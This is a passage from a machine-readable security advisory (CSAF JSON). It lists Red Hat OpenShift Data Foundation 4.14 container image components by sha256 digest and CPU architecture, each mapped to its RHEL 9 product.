"product_id": "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
